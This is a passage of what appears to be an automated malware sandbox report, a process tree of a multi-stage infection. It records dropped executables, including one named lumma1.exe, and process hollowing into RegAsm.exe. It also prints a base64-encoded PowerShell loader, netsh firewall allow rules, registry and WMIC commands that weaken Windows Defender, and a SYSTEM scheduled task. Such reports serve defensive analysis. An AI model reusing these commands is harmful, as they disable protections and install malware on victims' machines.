    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start PiercingNetLink
        5⤵
        Executes dropped EXE
        
        PID:3144
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "
      4⤵
      PID:1644
    - - C:\Windows\SysWOW64\sc.exe
        
        Sc delete GameSyncLinks
        5⤵
        Launches sc.exe
        
        PID:796
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameSyncLinks confirm
        5⤵
        Executes dropped EXE
        
        PID:4788
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
        5⤵
        Executes dropped EXE
        
        PID:3888
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start GameSyncLinks
        5⤵
        Executes dropped EXE
        
        PID:708
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
      4⤵
      PID:3116
- - C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe
    "C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:1704
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      Loads dropped DLL
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:8
- - C:\Users\Admin\AppData\Local\Temp\1000008001\udated.exe
    "C:\Users\Admin\AppData\Local\Temp\1000008001\udated.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:1684
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:4620
- - C:\Users\Admin\AppData\Local\Temp\1000009001\Scanner.exe
    "C:\Users\Admin\AppData\Local\Temp\1000009001\Scanner.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:2856
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3504
- - C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe
    "C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:1376
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:4656
- - C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe
    "C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe"
    3⤵
    - Executes dropped EXE
    PID:3328
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -EncodedCommand CgBmAHUAbgBjAHQAaQBvAG4AIAAdZ7GCFVn+YiAAewAKACAAIAAgACAAcABhAHIAYQBtACAAKAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJACFaLGCLAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJADgf/l6LAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJAA9hPZTCgAgACAAIAAgACkACgAKACAAIAAgACAAJADOmF17IAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQQBlAHMAXQA6ADoAQwByAGUAYQB0AGUAKAApAAoAIAAgACAAIAAkAM6YXXsuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwAKACAAIAAgACAAJADOmF17LgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJAA1dDZ0IAA9ACAAJADOmF17LgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQAhWixgiwAIAAkAOB/+XopAAoAIAAgACAAIAAkANiY6pYgAD0AIAAkADV0NnQuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAD2E9lMsACAAMAAsACAAJAA9hPZTLgBMAGUAbgBnAHQAaAApAAoACgAgACAAIAAgACQAzphdey4ARABpAHMAcABvAHMAZQAoACkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJADYmOqWCgB9AAoACgAkAENosYIgAD0AIAAnAEMAOgBcAFwAVQBzAGUAcgBzAFwAXABBAGQAbQBpAG4AXABcAEEAcABwAEQAYQB0AGEAXABcAEwAbwBjAGEAbABcAFwAVABlAG0AcABcAFwAZgBpAGwAZQAtAGsAdgBqADcANAB2AGsAYQBvAC4AdABtAHAAJwA7AAoAJACyg7GCIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAENosYIpADsACgAKACQAhWixgiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEMAMwAsADAAeAAyADEALAAwAHgARgBEACwAMAB4AEEARAAsADAAeAAxAEEALAAwAHgANQA0ACwAMAB4ADYARAAsADAAeAA2ADQALAAwAHgAQgBDACwAMAB4ADkARQAsADAAeAAzAEEALAAwAHgAQwBFACwAMAB4AEMAMAAsADAAeAA1AEQALAAwAHgAOQBCACwAMAB4AEMAMQAsADAAeAA3AEEALAAwAHgAOQA1ACwAMAB4ADgANAAsADAAeABGADUALAAwAHgARABCACwAMAB4ADcAMQAsADAAeABBADIALAAwAHgAMAAzACwAMAB4ADIAOAAsADAAeAAzAEYALAAwAHgARQBEACwAMAB4ADIAQwAsADAAeAA0ADAALAAwAHgARABEACwAMAB4ADUAMQAsADAAeAAxAEMAKQAKACQA4H/5eiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4ADAARQAsADAAeAA3ADkALAAwAHgAMQA1ACwAMAB4AEEAMQAsADAAeABEADkALAAwAHgAOQBBACwAMAB4ADMARgAsADAAeABGAEEALAAwAHgAMwA1ACwAMAB4ADEAQgAsADAAeAA5ADEALAAwAHgARgAzACwAMAB4ADQAMQAsADAAeABFADQALAAwAHgAMAA0ACwAMAB4ADMARQApAAoACgAkAD2E9lMgAD0AIAAdZ7GCFVn+YiAALQCFaLGCIAAkAIVosYIgAC0A4H/5eiAAJADgf/l6IAAtAD2E9lMgACQAsoOxggoACgAkALKEbFHxgiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQAPYT2UykAKQA7AAoAJADLeUNTIAA9ACAAJACyhGxR8YIuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAKACQAy3lDUy4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgAKAA=="
      4⤵
      PID:1888
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -EncodedCommand CgBmAHUAbgBjAHQAaQBvAG4AIAAdZ7GCFVn+YiAAewAKACAAIAAgACAAcABhAHIAYQBtACAAKAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJACFaLGCLAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJADgf/l6LAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJAA9hPZTCgAgACAAIAAgACkACgAKACAAIAAgACAAJADOmF17IAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQQBlAHMAXQA6ADoAQwByAGUAYQB0AGUAKAApAAoAIAAgACAAIAAkAM6YXXsuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwAKACAAIAAgACAAJADOmF17LgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJAA1dDZ0IAA9ACAAJADOmF17LgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQAhWixgiwAIAAkAOB/+XopAAoAIAAgACAAIAAkANiY6pYgAD0AIAAkADV0NnQuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAD2E9lMsACAAMAAsACAAJAA9hPZTLgBMAGUAbgBnAHQAaAApAAoACgAgACAAIAAgACQAzphdey4ARABpAHMAcABvAHMAZQAoACkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJADYmOqWCgB9AAoACgAkAENosYIgAD0AIAAnAEMAOgBcAFwAVQBzAGUAcgBzAFwAXABBAGQAbQBpAG4AXABcAEEAcABwAEQAYQB0AGEAXABcAEwAbwBjAGEAbABcAFwAVABlAG0AcABcAFwAZgBpAGwAZQAtAGsAdgBqADcANAB2AGsAYQBvAC4AdABtAHAAJwA7AAoAJACyg7GCIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAENosYIpADsACgAKACQAhWixgiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEMAMwAsADAAeAAyADEALAAwAHgARgBEACwAMAB4AEEARAAsADAAeAAxAEEALAAwAHgANQA0ACwAMAB4ADYARAAsADAAeAA2ADQALAAwAHgAQgBDACwAMAB4ADkARQAsADAAeAAzAEEALAAwAHgAQwBFACwAMAB4AEMAMAAsADAAeAA1AEQALAAwAHgAOQBCACwAMAB4AEMAMQAsADAAeAA3AEEALAAwAHgAOQA1ACwAMAB4ADgANAAsADAAeABGADUALAAwAHgARABCACwAMAB4ADcAMQAsADAAeABBADIALAAwAHgAMAAzACwAMAB4ADIAOAAsADAAeAAzAEYALAAwAHgARQBEACwAMAB4ADIAQwAsADAAeAA0ADAALAAwAHgARABEACwAMAB4ADUAMQAsADAAeAAxAEMAKQAKACQA4H/5eiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4ADAARQAsADAAeAA3ADkALAAwAHgAMQA1ACwAMAB4AEEAMQAsADAAeABEADkALAAwAHgAOQBBACwAMAB4ADMARgAsADAAeABGAEEALAAwAHgAMwA1ACwAMAB4ADEAQgAsADAAeAA5ADEALAAwAHgARgAzACwAMAB4ADQAMQAsADAAeABFADQALAAwAHgAMAA0ACwAMAB4ADMARQApAAoACgAkAD2E9lMgAD0AIAAdZ7GCFVn+YiAALQCFaLGCIAAkAIVosYIgAC0A4H/5eiAAJADgf/l6IAAtAD2E9lMgACQAsoOxggoACgAkALKEbFHxgiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQAPYT2UykAKQA7AAoAJADLeUNTIAA9ACAAJACyhGxR8YIuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAKACQAy3lDUy4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgAKAA==
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2256
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
        6⤵
        Drops startup file
        Suspicious use of AdjustPrivilegeToken
        
        PID:1436
        
        C:\Users\Admin\Pictures\SUk9Dx9KB9NHohPMqYPvcFtz.exe
        
        "C:\Users\Admin\Pictures\SUk9Dx9KB9NHohPMqYPvcFtz.exe"
        7⤵
        Executes dropped EXE
        
        PID:4928
        
        C:\Users\Admin\AppData\Local\Temp\u3sw.0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u3sw.0.exe"
        8⤵
        Executes dropped EXE
        
        PID:4556
        
        C:\Users\Admin\AppData\Local\Temp\u3sw.1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u3sw.1.exe"
        8⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:2916
        
        C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
        9⤵
        
        PID:4932
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 1036
        8⤵
        Program crash
        
        PID:1704
        
        C:\Users\Admin\Pictures\FszrjawS9fPLQZ7mFd7V7Lmw.exe
        
        "C:\Users\Admin\Pictures\FszrjawS9fPLQZ7mFd7V7Lmw.exe"
        7⤵
        Executes dropped EXE
        
        PID:1124
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4688
        
        C:\Users\Admin\Pictures\FszrjawS9fPLQZ7mFd7V7Lmw.exe
        
        "C:\Users\Admin\Pictures\FszrjawS9fPLQZ7mFd7V7Lmw.exe"
        8⤵
        
        PID:5468
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5660
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        9⤵
        
        PID:3504
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        10⤵
        Modifies Windows Firewall
        
        PID:5964
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5948
        
        C:\Users\Admin\Pictures\0xYvEN3BkDObbHJJpOC5I8sz.exe
        
        "C:\Users\Admin\Pictures\0xYvEN3BkDObbHJJpOC5I8sz.exe"
        7⤵
        Executes dropped EXE
        
        PID:3340
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2360
        
        C:\Users\Admin\Pictures\0xYvEN3BkDObbHJJpOC5I8sz.exe
        
        "C:\Users\Admin\Pictures\0xYvEN3BkDObbHJJpOC5I8sz.exe"
        8⤵
        
        PID:952
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5012
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        9⤵
        
        PID:5484
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        10⤵
        Modifies Windows Firewall
        
        PID:5804
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:788
        
        C:\Users\Admin\Pictures\YJwP5U6D0gUWXm0tvq2yHCEw.exe
        
        "C:\Users\Admin\Pictures\YJwP5U6D0gUWXm0tvq2yHCEw.exe"
        7⤵
        Executes dropped EXE
        
        PID:2072
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4652
        
        C:\Users\Admin\Pictures\YJwP5U6D0gUWXm0tvq2yHCEw.exe
        
        "C:\Users\Admin\Pictures\YJwP5U6D0gUWXm0tvq2yHCEw.exe"
        8⤵
        
        PID:2888
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5396
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        9⤵
        
        PID:3176
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        10⤵
        Modifies Windows Firewall
        
        PID:5568
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5680
        
        C:\Users\Admin\Pictures\uJNyGwtKRLdEnZrYZRh3seW5.exe
        
        "C:\Users\Admin\Pictures\uJNyGwtKRLdEnZrYZRh3seW5.exe"
        7⤵
        Executes dropped EXE
        
        PID:3156
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2532
        
        C:\Users\Admin\Pictures\uJNyGwtKRLdEnZrYZRh3seW5.exe
        
        "C:\Users\Admin\Pictures\uJNyGwtKRLdEnZrYZRh3seW5.exe"
        8⤵
        
        PID:5864
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2464
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        9⤵
        
        PID:2980
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        10⤵
        Modifies Windows Firewall
        
        PID:1944
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5580
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2012
        
        C:\Users\Admin\Pictures\BPm8VMr5JPFgyG0fd1Xc93iP.exe
        
        "C:\Users\Admin\Pictures\BPm8VMr5JPFgyG0fd1Xc93iP.exe"
        7⤵
        Modifies firewall policy service
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:128
        
        C:\Users\Admin\Pictures\7w1rpETPAfM2gG4wHhv6MuLK.exe
        
        "C:\Users\Admin\Pictures\7w1rpETPAfM2gG4wHhv6MuLK.exe"
        7⤵
        
        PID:1356
        
        C:\Users\Admin\AppData\Local\Temp\7zS2716.tmp\Install.exe
        
        .\Install.exe /tEdidDDf "385118" /S
        8⤵
        
        PID:684
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        9⤵
        
        PID:4772
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        10⤵
        
        PID:1488
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        11⤵
        
        PID:2704
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        12⤵
        
        PID:5164
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        10⤵
        
        PID:5388
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        11⤵
        
        PID:5400
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        12⤵
        
        PID:5440
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        10⤵
        
        PID:5480
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        11⤵
        
        PID:5512
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        12⤵
        
        PID:5528
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        10⤵
        
        PID:5544
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        11⤵
        
        PID:5560
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        12⤵
        
        PID:5576
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        10⤵
        
        PID:5592
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        11⤵
        
        PID:5620
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5664
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        13⤵
        
        PID:5188
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        9⤵
        
        PID:5944
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        10⤵
        
        PID:6008
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6064
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        12⤵
        
        PID:5256
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 21:28:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS2716.tmp\Install.exe\" it /amwdidBjHT 385118 /S" /V1 /F
        9⤵
        Creates scheduled task(s)
        
        PID:2704
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
        9⤵
        
        PID:5512
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        10⤵
        
        PID:5656
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        11⤵
        
        PID:5820
        
        C:\Users\Admin\Pictures\FJ2MkR5WEJ1MR9EqZQwmKoTr.exe
        
        "C:\Users\Admin\Pictures\FJ2MkR5WEJ1MR9EqZQwmKoTr.exe"
        7⤵
        
        PID:5692
        
        C:\Users\Admin\AppData\Local\Temp\7zS39F2.tmp\Install.exe
        
        .\Install.exe /tEdidDDf "385118" /S
        8⤵
        
        PID:5836
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        9⤵
        
        PID:6036
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        10⤵
        
        PID:2060
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        11⤵
        
